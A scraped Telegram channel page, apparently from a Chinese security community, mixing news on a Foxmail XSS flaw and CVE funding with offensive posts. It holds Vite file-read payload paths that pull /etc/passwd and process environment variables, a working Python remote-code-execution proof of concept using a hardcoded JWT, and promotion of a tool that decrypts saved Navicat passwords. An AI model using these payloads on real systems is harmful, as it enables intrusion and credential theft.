Warning: Undefined array key 0 in /var/www/tgoop/function.php on line 65

Warning: Trying to access array offset on value of type null in /var/www/tgoop/function.php on line 65
1995 - Telegram Web
Telegram Web
撕逼2
1
👍2
Forwarded from 渊龙Sec安全团队
实战场景下,任何可以被利用的基础设施都要关注到,才能在多维度对内网进行“降维打击”🧐
近期写了一款工具,能够读取系统注册表,自动解密Navicat Premium保存的账号密码,便于进一步渗透😋
GitHub地址:https://github.com/AabyssZG/NavicatPwn
如果觉得不错的师傅欢迎给我点个Star~🥰
👍5
原频道申诉回来了 家人们 what can i say
https://www.tgoop.com/Oracleimpact
🥰13😁1😭1
Forwarded from LoopDNS资讯播报
漏洞:Foxmail邮件客户端存在跨站脚本攻击漏洞

漏洞编号:CNTA-2025-0007
重要等级:中等
影响范围:< 7.2.25 [Windows]
漏洞类型:跨站脚本

漏洞概述:该漏洞由于 Foxmail 在加载邮件正文中的 HTML 内容时,对危险内容的过滤处理逻辑存在缺陷。攻击者可利用该漏洞构造包含恶意指令代码的电子邮件,受害者在使用Foxmail打开浏览电子邮件时,无需额外点击,恶意指令代码即被用户主机加载并执行。

风险描述:
1. 攻击者以用户身份即可获取权限。
2. 攻击者无需以用户进行额外点击操作,受害者只需使用 Foxmail 打开或预览带有恶意脚本的邮件,恶意代码即可在后台加载并执行。
3. 受害者设备上,无论是否点击链接、加载图像或执行附件文件,只要客户端自动处理或显示邮件内容,即可能被利用

处置建议: Foxmail 官方已发布修复版本,建议用户务必及时更新至最新版本。如无法立刻升级,可先暂停使用受影响的 Foxmail 客户端版本,或临时改用网页版或其他平台的安全邮件客户端,以确保邮件收发的安全性和稳定性。

补充:该漏洞利用方式简单且具备规模化利用的条件,目前已存在关于该漏洞的在野利用行为

参考信息:国家计算机网络应急技术处理协调中心
🌚2👍1
Forwarded from Eternal_安全内参
/@fs/etc/passwd?import&?inline=1.wasm?init
/@fs/C://windows/win.ini?import&?inline=1.wasm?init
Puddin在TG上看到了啥
vite还在发力 CVE-2025-31125(CVE-2025-30208的Bypass)
vite还在在发力

/@fs/etc/passwd?.svg?.wasm?init


CVE-2025-31486
Puddin在TG上看到了啥
vite还在在发力 /@fs/etc/passwd?.svg?.wasm?init CVE-2025-31486
vite还在在在发力

/@fs/app#/../proc/self/environ


CVE-2025-32395

需要猜vite项目所在地址,可以从403的返回界面看到(
😁10
佰阅发卡存在RCE漏洞,省流:eval解析json+硬编码JWT secret

POC:

import requests

cmd = "ls /"
url = "http://xxx"
jwt_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZGVudGl0eSI6eyJlbWFpbCI6ImFkbWluQHFxLmNvbSJ9LCJleHAiOjE3NDQ4NzExNDZ9.jf8YjUqXWVschKPSvKjv7lcQZrhynLla6AWqH6WWavg"
resp = requests.post(
url + "/api/v4/update_pays",
headers={"Authorization": "Bearer " + jwt_token},
json={
"data": {
# "config": f"[exec({payload!r}), f()][-1]",
"config": f"__import__('os').popen({cmd!r}).read()",
"icon": "\u652f\u4ed8\u5b9d",
"id": 2,
"info": "0\u8d39\u7387\u5b9e\u65f6\u5230\u8d26",
"isactive": False,
"name": "V\u514d\u7b7e\u652f\u4ed8\u5b9d",
}
},
)
resp = requests.get(
url + "/api/v4/get_pays",
headers={"Authorization": "Bearer " + jwt_token},
)
print([item["config"] for item in resp.json() if item.get("id") == 2].pop())



https://mp.weixin.qq.com/s/3fT7r6bHfzXs7vX0rMI54g
😁41
Forwarded from 科技圈🎗在花频道📮
美国CVE漏洞数据库面临资金枯竭危机

美国非营利组织 MITRE 负责维护的全球网络安全关键漏洞数据库——“常见漏洞与披露”(CVE),由政府提供的资金将于本周三到期,或将面临停摆。

CVE漏洞数据库是全球网络安全生态系统的重要基石,为各组织提供漏洞编号、严重程度分级及详细描述。安全专家担忧,一旦CVE漏洞数据库停摆,将严重冲击全球漏洞管理与应变机制,对企业和 CERT(电脑紧急应变小组)等都将产生“快速且严重”的连锁反应。

路透社

📮投稿 ☘️频道 🌸聊天
😨1
2025/07/10 11:22:56
Back to Top
HTML Embed Code: